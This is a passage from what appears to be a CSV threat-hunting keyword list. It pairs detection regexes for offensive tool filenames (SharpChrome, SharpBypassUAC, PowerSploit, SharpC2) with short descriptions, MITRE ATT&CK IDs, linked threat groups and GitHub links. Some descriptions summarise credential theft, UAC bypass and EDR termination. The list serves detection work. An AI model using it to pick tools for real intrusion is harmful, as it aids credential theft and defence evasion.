- T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - 
T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","N/A","10","2341","232","2025-04-03T04:19:29Z","2020-03-30T07:03:47Z","10861" "*/Sharefinder.ps1",".{0,1000}\/Sharefinder\.ps1","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","10862" "*/shares-with-SCF.txt*",".{0,1000}\/shares\-with\-SCF\.txt.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential 
Access","https://github.com/DanMcInerney/icebreaker","1","0","#linux","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","10863" "*/sharklog.log*",".{0,1000}\/sharklog\.log.{0,1000}","offensive_tool_keyword","BabyShark","This is a basic C2 generic server written in Python and Flask.","T1547.001 - T1059.003 - T1132.001 - T1140 - T1083 - T1070.004 - T1105 - T1056.001 - T1057 - T1012 - T1053.005 - T1218.005 - T1082 - T1016 - T1033","TA0006 - TA0011 - TA0040","N/A","Kimsuky","C2","https://github.com/UnkL4b/BabyShark","1","0","#linux","N/A","10","10","189","30","2021-07-03T00:18:18Z","2020-06-02T12:27:20Z","10864" "*/Sharp3389.exe*",".{0,1000}\/Sharp3389\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10865" "*/SharpADWS.git*",".{0,1000}\/SharpADWS\.git.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","1","N/A","N/A","7","6","538","59","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z","10866" "*/SharpAllowedToAct.exe*",".{0,1000}\/SharpAllowedToAct\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - 
T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","10867" "*/SharpAllowedToAct.exe*",".{0,1000}\/SharpAllowedToAct\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","10868" "*/SharpAltSecIds.exe*",".{0,1000}\/SharpAltSecIds\.exe.{0,1000}","offensive_tool_keyword","SharpAltSecIds","Shadow Credentials via altSecurityIdentities - Enables attackers to add altSecurityIdentities entries to an account - linking it to an X.509 certificate for authentication. This allows them to impersonate the targeted account and authenticate using the associated certificate","T1098.003 - T1556.002 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/bugch3ck/SharpAltSecIds","1","1","N/A","N/A","9","1","12","3","2022-05-30T13:50:05Z","2022-05-30T13:40:17Z","10869" "*/SharpAltSecIds.git*",".{0,1000}\/SharpAltSecIds\.git.{0,1000}","offensive_tool_keyword","SharpAltSecIds","Shadow Credentials via altSecurityIdentities - Enables attackers to add altSecurityIdentities entries to an account - linking it to an X.509 certificate for authentication. 
This allows them to impersonate the targeted account and authenticate using the associated certificate","T1098.003 - T1556.002 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/bugch3ck/SharpAltSecIds","1","1","N/A","N/A","9","1","12","3","2022-05-30T13:50:05Z","2022-05-30T13:40:17Z","10870" "*/SharpApplocker.exe*",".{0,1000}\/SharpApplocker\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","10871" "*/SharpApplocker.exe*",".{0,1000}\/SharpApplocker\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","10872" "*/SharpAppLocker.git*",".{0,1000}\/SharpAppLocker\.git.{0,1000}","offensive_tool_keyword","SharpAppLocker","Useful when you already bypassed AppLocker initially and you don't want to leave PS logs","T1086 - T1569.002 - T1070.003","TA0005 - TA0006","N/A","N/A","Defense 
Evasion","https://github.com/Flangvik/SharpAppLocker","1","1","N/A","N/A","7","1","99","16","2022-12-08T11:06:40Z","2020-08-01T12:58:36Z","10873" "*/SharpAVKB.exe*",".{0,1000}\/SharpAVKB\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10874" "*/SharpAVKB.exe*",".{0,1000}\/SharpAVKB\.exe.{0,1000}","offensive_tool_keyword","SharpAVKB","Windows Antivirus Comparison and Patch Number Comparison","T1082 - T1518 - T1083","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpAVKB","1","1","N/A","N/A","4","1","58","24","2019-10-28T06:50:30Z","2019-10-14T12:44:22Z","10875" "*/SharpAVKB.git*",".{0,1000}\/SharpAVKB\.git.{0,1000}","offensive_tool_keyword","SharpAVKB","Windows Antivirus Comparison and Patch Number Comparison","T1082 - T1518 - T1083","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpAVKB","1","1","N/A","N/A","4","1","58","24","2019-10-28T06:50:30Z","2019-10-14T12:44:22Z","10876" "*/SharpAzbelt.git*",".{0,1000}\/SharpAzbelt\.git.{0,1000}","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. 
It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery","https://github.com/redskal/SharpAzbelt","1","1","N/A","N/A","8","1","26","7","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z","10877" "*/SharpBlackout.git*",".{0,1000}\/SharpBlackout\.git.{0,1000}","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","1","N/A","N/A","10","1","83","20","2025-03-21T16:33:42Z","2023-08-23T14:16:40Z","10878" "*/SharpBlock.exe*",".{0,1000}\/SharpBlock\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","10879" "*/SharpBruteForceSSH.git*","\/SharpBruteForceSSH\.git","offensive_tool_keyword","SharpBruteForceSSH","simple SSH brute force tool ","T1110.003 - T1078","TA0006 ","N/A","N/A","Credential Access","https://github.com/HernanRodriguez1/SharpBruteForceSSH","1","1","N/A","N/A","9","1","60","10","2024-04-28T17:56:33Z","2024-04-25T20:06:05Z","10880" "*/SharpBuster.dll*",".{0,1000}\/SharpBuster\.dll.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool 
designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","1","N/A","N/A","7","1","62","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z","10881" "*/SharpBuster.exe*",".{0,1000}\/SharpBuster\.exe.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","1","N/A","N/A","7","1","62","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z","10882" "*/SharpBypassUAC.exe*",".{0,1000}\/SharpBypassUAC\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10883" "*/SharpBypassUAC.exe*",".{0,1000}\/SharpBypassUAC\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","10884" 
"*/SharpBypassUAC.exe*",".{0,1000}\/SharpBypassUAC\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","10885" "*/SharpC2*",".{0,1000}\/SharpC2.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","10886" "*/SharpCalendar/*.*",".{0,1000}\/SharpCalendar\/.{0,1000}\..{0,1000}","offensive_tool_keyword","cobaltstrike",".NET Assembly to Retrieve Outlook Calendar Details","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - 
TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/OG-Sadpanda/SharpCalendar","1","1","N/A","N/A","10","10","13","1","2021-10-07T19:42:20Z","2021-10-07T17:11:46Z","10887" "*/SharpCat/*",".{0,1000}\/SharpCat\/.{0,1000}","offensive_tool_keyword","cobaltstrike","C# alternative to the linux cat command... Prints file contents to console. 
For use with Cobalt Strike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/OG-Sadpanda/SharpCat","1","1","N/A","N/A","10","10","16","3","2021-07-15T15:01:02Z","2021-07-15T14:57:53Z","10888" "*/SharpChassisType.exe*",".{0,1000}\/SharpChassisType\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 
- T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10889" "*/SharpCheckInfo.exe*",".{0,1000}\/SharpCheckInfo\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10890" "*/SharpChisel.exe*",".{0,1000}\/SharpChisel\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","10891" "*/SharpChisel.exe*",".{0,1000}\/SharpChisel\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","10892" "*/SharpChrome.exe*",".{0,1000}\/SharpChrome\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","10893" "*/SharpChrome.exe*",".{0,1000}\/SharpChrome\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SharpChrome","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","10894" "*/SharpChrome.exe*",".{0,1000}\/SharpChrome\.exe.{0,1000}","offensive_tool_keyword","SharpChrome","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - 
T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SharpChrome","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","10895" "*/SharpChrome.exe*",".{0,1000}\/SharpChrome\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","10896" "*/SharpChromium.exe*",".{0,1000}\/SharpChromium\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10897" "*/SharpChromium.exe*",".{0,1000}\/SharpChromium\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated 
Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","10898" "*/SharpChromium.exe*",".{0,1000}\/SharpChromium\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","10899" "*/SharpChromium.git*",".{0,1000}\/SharpChromium\.git.{0,1000}","offensive_tool_keyword","SharpChromium",".NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.","T1555.003 - T1114.001 - T1555.004","TA0006 - TA0003","N/A","COZY BEAR","Credential Access","https://github.com/djhohnstein/SharpChromium","1","1","N/A","N/A","10","8","712","100","2020-10-23T22:28:13Z","2018-08-06T21:25:21Z","10900" "*/SharpClipboard.git*",".{0,1000}\/SharpClipboard\.git.{0,1000}","offensive_tool_keyword","SharpClipboard","monitor the content of the clipboard continuously","T1115","TA0006 - TA0009","N/A","N/A","Credential Access","http://github.com/slyd0g/SharpClipboard","1","1","N/A","N/A","8","1","N/A","N/A","N/A","N/A","10901" 
"*/SharpClipHistory.exe*",".{0,1000}\/SharpClipHistory\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10902" "*/SharpCloud.exe*",".{0,1000}\/SharpCloud\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - 